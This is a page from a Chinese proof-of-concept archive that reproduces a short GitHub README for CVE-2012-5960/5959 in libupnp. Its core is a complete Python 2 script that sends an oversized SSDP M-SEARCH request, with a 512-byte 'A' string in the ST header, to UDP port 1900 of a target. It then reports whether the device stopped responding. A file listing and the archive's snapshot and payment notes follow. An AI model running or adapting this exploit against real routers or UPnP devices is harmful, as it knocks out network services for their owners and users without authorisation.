关联漏洞
描述
CVE-2012-5960, CVE-2012-5959 Proof of Concept
介绍
# CVE-2012-5960-PoC
CVE-2012-5960, CVE-2012-5959 Proof of Concept
隨手記錄一下最近玩的東西。
```python=
#!/usr/bin/python2
# -*- coding: utf-8 -*-
# Usage: python2 libupnp_DoS_PoC.py
import socket
TARGET = 'TARGET_IP'
'''
normal_traffic = \
'M-SEARCH * HTTP/1.1\r\n' \
'HOST:239.255.255.250:1900\r\n' \
'MX:3\r\n' \
'MAN:"ssdp:discover"\r\n' \
'ST:upnp:rootdevice\r\n' \
'\r\n'
'''
dos = \
'M-SEARCH * HTTP/1.1\r\n' \
'HOST:239.255.255.250:1900\r\n' \
'MX:3\r\n' \
'MAN:"ssdp:discover"\r\n' \
'ST:uuid:schemas:device:{}:anything\r\n' \
'\r\n'.format("A"*512)
# Set up UDP socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.settimeout(1)
s.sendto(dos, (TARGET, 1900))
try:
while True:
data, addr = s.recvfrom(65507) # Maximum UDP data length
print "------------------------\nFailed DoS...\n------------------------\n"
print "Response:"
print addr, data
exit(1)
except socket.timeout:
print "------------------------\nSuccessful DoS!!!\n------------------------\n"
exit(0)
```
Tested on libupnp 1.6.13:
Demo video:
[](http://www.youtube.com/watch?v=3W3NO3nnKJM "")
文件快照
[4.0K] /data/pocs/39d473db7751cd111278a91909b89aee07a5c480
├── [1.2K] libupnp_DoS_PoC.py
├── [1.5K] README.md
└── [ 35K] ssdp_server(libupnp_1.6.13).c
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。